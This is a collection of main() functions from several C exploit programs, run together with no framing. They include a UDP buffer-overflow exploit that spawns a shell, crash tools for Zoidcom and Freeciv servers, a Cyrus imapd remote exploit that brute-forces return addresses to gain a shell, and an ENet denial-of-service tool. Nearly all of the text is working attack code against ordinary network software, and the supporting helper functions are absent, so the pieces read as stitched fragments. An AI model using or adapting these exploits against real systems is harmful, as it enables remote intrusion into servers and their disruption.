int main(int argc, char *argv[]) { unsigned char buffrecv[BUFFSZ], buffsend[sizeof(BOF1) + 64], challenge[16], bug, *bofstr, *stri, *strf; struct sockaddr_in peer; int sd, err, rlen, bufflen, proto; unsigned long offset; setbuf(stdout, NULL); if(argc < 2) { printf("\nUsage: %s <host> <port>\n\n", argv[0], PORT); exit(1); } printf("OK team, follow my command.\n"); srand(time(NULL)); bofstr=BOF1; peer.sin_addr.s_addr = resolv(argv[1]); peer.sin_port = htons(atoi(argv[2])); // offset=strtoul(argv[3],NULL,16); peer.sin_family = AF_INET; rlen = sizeof(peer); offset=0x0804AE93; // call eax printf("Using offset 0x%08x...\n",offset); sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(sd < 0) std_err(); /* GET INFORMATIONS */ err = sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, rlen); if(err < 0) std_err(); err = timeout2(sd); if(err < 0) { fputs("\nError: socket timeout\n", stdout); exit(1); } err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen); if(err < 0) std_err(); buffrecv[err] = 0x00; proto = getproto(buffrecv); showinfostring(buffrecv, err); /* GET CHALLENGE NUMBER */ err = sendto(sd, GETCH, sizeof(GETCH) - 1, 0, (struct sockaddr *)&peer, rlen); if(err < 0) std_err(); err = timeout2(sd); if(err < 0) { fputs("\nError: socket timeout\n", stdout); exit(1); } err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen); if(err < 0) std_err(); buffrecv[err] = 0x00; stri = strchr(buffrecv, 0x20); if(!stri) stri = buffrecv; strf = strchr(stri + 1, 0x20); if(!strf) strf = buffrecv + err; *strf = 0x00; strncpy(challenge, stri, 16); printf("Challenge: %s\n", challenge); bufflen = snprintf(buffsend, sizeof(BOF1) + 64, bofstr, proto, challenge, (long)(rand() << 1) + (rand() & 0xf), /* 31bit */ (long)(rand() << 1) + (rand() & 0xf), (long)(rand() << 1) + (rand() & 0xf), (long)(rand() << 1) + (rand() & 0xf), offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF, offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF, offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF); if(bufflen < 0) { fputs("\nError: cannot allocate buffer in memory\n", stdout); exit(1); } printf("Sending deadly packet ... stand by\n"); err = sendto(sd, buffsend, bufflen, 0, (struct sockaddr *)&peer, rlen); if(err < 0) std_err(); err = timeout2(sd); if(err < 0) { fputs("\nResult: The remote server IS vulnerable!!!\n", stdout); exec_sh(connect_sh(argv[1])); return(0); } err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen); if(err < 0) std_err(); buffrecv[err] = 0x00; printf("Connect: %s\n", buffrecv + 5); close(sd); fputs("\nResult: The server doesn't seems to be vulnerable\n\n", stdout); return(0); }
int main(int argc, char *argv[]) { struct sockaddr_in peer; int sd, i; u16 port = PORT; u8 buff[16]; #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif setbuf(stdout, NULL); fputs("\n" "Zoidcom <= 0.6.7 crash "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: aluigi.org\n" "\n", stdout); if(argc < 2) { printf("\n" "Usage: %s <host> [port(%hu)]\n" "\n", argv[0], port); exit(1); } if(argc > 2) port = atoi(argv[2]); peer.sin_addr.s_addr = resolv(argv[1]); peer.sin_port = htons(port); peer.sin_family = AF_INET; printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), port); sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(sd < 0) std_err(); // the following is a classical join packet memcpy(buff, "\xec\x03\x00\x00\x00\x68\xc0\xff\xe9\x00\x80\x07\x00\x64\x00\x01", 16); buff[8] = 0x69; printf("- send malicious packet 0x%02x\n", buff[8]); for(i = 0; i < 2; i++) { if(sendto(sd, buff, 16, 0, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); sleep(0); } sleep(ONESEC); buff[8] = 0xa9; printf("- send malicious packet 0x%02x\n", buff[8]); for(i = 0; i < 2; i++) { if(sendto(sd, buff, 16, 0, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); sleep(0); } close(sd); printf("- the server should have been crashed, check it manually\n"); return(0); }
int main(int argc, char *argv[]) { struct sockaddr_in peer; u_int boomsz; int sd, i; u_short port = PORT; u_char buff[6]; #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif srand(time(NULL)); setbuf(stdout, NULL); fputs("\n" "Freeciv <= 2.0.7 jumbo malloc crash "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: http://aluigi.altervista.org\n" "\n", stdout); if(argc < 2) { printf("\n" "Usage: %s <host> [port(%hu)]\n" "\n", argv[0], port); exit(1); } if(argc > 2) port = atoi(argv[2]); peer.sin_addr.s_addr = resolv(argv[1]); peer.sin_port = htons(port); peer.sin_family = AF_INET; printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), port); sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sd < 0) std_err(); printf("- connect..."); if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); printf(" done\n"); boomsz = 6 + (rand() * 1234); for(;;) { if(!boomsz) boomsz++; if(boomsz > 0) boomsz = -boomsz; if((u_int)((boomsz - 6) * 100) > 0x7fffffff) break; boomsz *= 1234; // more than 2 gigabytes, I want to be sure } *(u_short *)buff = JUMBO_SIZE; *(u_int *)(buff + 2) = htonl(boomsz); // int compressed_size = whole_packet_len - header_size; // header_size = 6 // long int decompressed_size = 100 * compressed_size; printf("- send BOOM data (try to allocate %u bytes on the remote system)\n", (u_int)(ntohl(*(u_int *)(buff + 2)) - 6) * 100); if(send(sd, buff, 6, 0) < 0) std_err(); printf("- wait some seconds:\n"); for(i = 3; i >= 0; i--) { printf("%3d\r", i); sleep(ONESEC); } close(sd); printf( "- the server should be crashed or freezed, check it manually\n" " if it's still online retry again with this tool or the server is patched\n" "\n"); return(0); }
int main(int argc, char **argv){ char *payload = NULL, *hostn = NULL, buffer[1024], *ptr; int i, first, sock, opt, target = 0, port = 143, shell_port = atoi(SHELL_PORT), sleeps = 1, p_size=10000, ret_bf_start = RET_BF_START, ret_bf_end = RET_BF_END, vulncheck = 1; fd_set fds; struct sockaddr_in addr; printf("[!] Cyrus imapd 2.2.4 - 2.2.8 remote exploit by crash-x / unl0ck\n"); if (argc < 2) usage(argv[0]); while ((opt = getopt (argc, argv, "h:p:t:s:P:S:E:vV")) != -1){ switch (opt){ case 'h': hostn = optarg; break; case 'p': port = atoi(optarg); if(port > 65535 || port < 1){ printf("[-] Port %d is invalid\n",port); return 1; } break; case 't': target = atoi(optarg); for(i = 0; targets[i].platform; i++); if(target >= i && target != 1337){ printf("[-] Wtf are you trying to target?\n"); usage(argv[0]); } break; case 'S': ret_bf_start = strtoul(optarg,NULL,0); if(!ret_bf_start){ printf("[-] Wtf thats not a valid bruteforce start address!\n"); usage(argv[0]); } break; case 'E': ret_bf_end = strtoul(optarg,NULL,0); if(!ret_bf_end){ printf("[-] Wtf thats not a valid bruteforce end address!\n"); usage(argv[0]); } break; case 's': sleeps = atoi(optarg); break; case 'P': p_size = atoi(optarg); if(p_size < 1000){ printf("[-] Its a bad idea to have a payload with less than 1000 bytes :)\n"); return 1; } break; case 'v': vulncheck = 2; break; case 'V': vulncheck = 0; break; default: usage(argv[0]); } } if(hostn == NULL) usage(argv[0]); if(payload == NULL){ if(!(payload = malloc(p_size))){ printf("[-] Wasnt able to allocate space for the payload!\n"); return 1; } } resolv(&addr, hostn); if(vulncheck == 2){ vulnchck(addr, port); return 1; } else if(vulncheck == 1) vulnchck(addr, port); if(target != 1337){ ret_bf_start = targets[target].retloc; ret_bf_end = targets[target].retloc+5; printf ("[!] Targeting %s\n", targets[target].platform); } else printf("[!] Starting bruteforce attack!\n"); for(i = 0, first = 1; ret_bf_start < ret_bf_end; i++, first++){ if((sock = conn(addr, port)) == -1){ if(first != 1) printf("\n"); printf("[-] Connecting failed!\n"); break; } if(i == 4) ret_bf_start += (p_size - (p_size/10)); else ret_bf_start++; gen_payload(payload, p_size, ret_bf_start, 1); status(ret_bf_start, ret_bf_start + (p_size - (p_size/10)), ret_bf_start + (p_size - (p_size/10/2))); sockprintf(sock, "%s\r\n", payload); if(i == 4){ get_shell(addr, shell_port, sleeps); i = 0; } if(ret_bf_start >= ret_bf_end) printf("[-]\n"); close(sock); } printf("[-] Exploit failed!\n"); return 1; }
int main(int argc, char *argv[]) { ENetProtocolHeader *header; ENetProtocol *command; u_int chall, stime; int sd, len, attack; u_char buff[8192]; #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif setbuf(stdout, NULL); fputs("\n" "ENet library <= Jul 2005 multiple vulnerabilities "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: http://aluigi.altervista.org\n" "\n", stdout); if(argc < 3) { printf("\n" "Usage: %s <attack> <host> <port> [commandLength(0x%08x)]\n" "\n" "Attack:\n" " 1 = invalid memory access\n" " 2 = allocation abort with fragment\n" "\n" " Default port examples: Cube on 28765, Sauerbraten on 28785\n" " commandLength is the big value to use for both the attacks, read my advisory\n" "\n", argv[0], commandLength); exit(1); } header = (ENetProtocolHeader *)buff; command = (ENetProtocol *)(buff + sizeof(ENetProtocolHeader)); attack = atoi(argv[1]); if(argc > 4) commandLength = get_num(argv[4]); peer.sin_addr.s_addr = resolv(argv[2]); peer.sin_port = htons(atoi(argv[3])); peer.sin_family = AF_INET; printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port)); sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(sd < 0) std_err(); stime = MYRAND; chall = ~stime; if(attack == 1) { printf("- send malformed packet\n"); header->peerID = htons(0xffff); header->flags = 0; header->commandCount = 1 + (MYRAND % 255); // major than 1 header->sentTime = stime; header->challenge = chall; command->header.command = ENET_PROTOCOL_COMMAND_CONNECT; command->header.channelID = 0xff; command->header.flags = ENET_PROTOCOL_FLAG_ACKNOWLEDGE; command->header.reserved = 0; command->header.commandLength = htonl(commandLength); // BOOM command->header.reliableSequenceNumber = htonl(1); command->connect.outgoingPeerID = htons(0); command->connect.mtu = htons(1400); command->connect.windowSize = htonl(32768); command->connect.channelCount = htonl(ENET_PROTOCOL_MINIMUM_CHANNEL_COUNT); command->connect.incomingBandwidth = htonl(0); command->connect.outgoingBandwidth = htonl(0); command->connect.packetThrottleInterval = htonl(5000); command->connect.packetThrottleAcceleration = htonl(2); command->connect.packetThrottleDeceleration = htonl(2); len = send_recv(sd, buff, sizeof(ENetProtocolCommandHeader) + sizeof(ENetProtocolConnect), buff, sizeof(buff), 0); if(len < 0) { printf("- no reply from the server, it should be already crashed\n"); } } else if(attack == 2) { printf("- start connection to host\n"); printf(" send connect\n"); header->peerID = htons(0xffff); header->flags = 0; header->commandCount = 1; header->sentTime = stime; header->challenge = chall; command->header.command = ENET_PROTOCOL_COMMAND_CONNECT; command->header.channelID = 0xff; command->header.flags = ENET_PROTOCOL_FLAG_ACKNOWLEDGE; command->header.reserved = 0; command->header.commandLength = htonl(sizeof(ENetProtocolConnect)); command->header.reliableSequenceNumber = htonl(1); command->connect.outgoingPeerID = htons(0); command->connect.mtu = htons(1400); command->connect.windowSize = htonl(32768); command->connect.channelCount = htonl(2); command->connect.incomingBandwidth = htonl(0); command->connect.outgoingBandwidth = htonl(0); command->connect.packetThrottleInterval = htonl(5000); command->connect.packetThrottleAcceleration = htonl(2); command->connect.packetThrottleDeceleration = htonl(2); len = send_recv(sd, buff, sizeof(ENetProtocolCommandHeader) + ntohl(command->header.commandLength), buff, sizeof(buff), 1); printf(" send ack\n"); /* SRV header->peerID */ header->flags = 0; header->commandCount = 1; stime = ntohl(header->sentTime); // useless??? header->sentTime = htonl(stime + 1); /* SRV header->challenge */ command->header.command = ENET_PROTOCOL_COMMAND_ACKNOWLEDGE; /* SRV command->header.channelID */ command->header.flags = 0; command->header.reserved = 0; command->header.commandLength = htonl(sizeof(ENetProtocolAcknowledge)); command->header.reliableSequenceNumber = htonl(1); /* SRV command->acknowledge.receivedReliableSequenceNumber */ command->acknowledge.receivedSentTime = htonl(stime); len = send_recv(sd, buff, sizeof(ENetProtocolCommandHeader) + ntohl(command->header.commandLength), buff, sizeof(buff), 1); printf(" send malformed fragment\n"); len = 10 + (MYRAND % 1000); /* SRV header->peerID */ header->flags = 0; header->commandCount = 1; header->sentTime = htonl(ntohl(header->sentTime) + 1); /* SRV header->challenge */ command->header.command = ENET_PROTOCOL_COMMAND_SEND_FRAGMENT; command->header.channelID = 0; command->header.flags = ENET_PROTOCOL_FLAG_ACKNOWLEDGE; command->header.reserved = 0; command->header.commandLength = htonl(sizeof(ENetProtocolSendFragment) + len); command->header.reliableSequenceNumber = htonl(1); command->sendFragment.startSequenceNumber = htonl(1); command->sendFragment.fragmentCount = htonl(2 + (MYRAND % 2000)); command->sendFragment.fragmentNumber = htonl(0); command->sendFragment.totalLength = htonl(commandLength); command->sendFragment.fragmentOffset = htonl(0); memset(command + sizeof(ENetProtocolSendFragment), len, len); // first len is for random len = send_recv(sd, buff, sizeof(ENetProtocolCommandHeader) + ntohl(command->header.commandLength), buff, sizeof(buff), 0); if(len < 0) { printf("- no reply from the server, it should be already crashed\n"); } } close(sd); printf("- check server:\n"); sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(sd < 0) std_err(); stime = MYRAND; chall = ~stime; header->peerID = htons(0xffff); header->flags = 0; header->commandCount = 1; header->sentTime = stime; header->challenge = chall; command->header.command = ENET_PROTOCOL_COMMAND_CONNECT; command->header.channelID = 0xff; command->header.flags = ENET_PROTOCOL_FLAG_ACKNOWLEDGE; command->header.reserved = 0; command->header.commandLength = htonl(sizeof(ENetProtocolConnect)); command->header.reliableSequenceNumber = htonl(1); command->connect.outgoingPeerID = htons(0); command->connect.mtu = htons(1400); command->connect.windowSize = htonl(32768); command->connect.channelCount = htonl(ENET_PROTOCOL_MINIMUM_CHANNEL_COUNT); command->connect.incomingBandwidth = htonl(0); command->connect.outgoingBandwidth = htonl(0); command->connect.packetThrottleInterval = htonl(5000); command->connect.packetThrottleAcceleration = htonl(2); command->connect.packetThrottleDeceleration = htonl(2); len = send_recv(sd, buff, sizeof(ENetProtocolCommandHeader) + ntohl(command->header.commandLength), buff, sizeof(buff), 0); if(len < 0) { printf("\n Server IS vulnerable!!!\n\n"); } else { printf("\n Server does not seem vulnerable\n\n"); } close(sd); return(0); }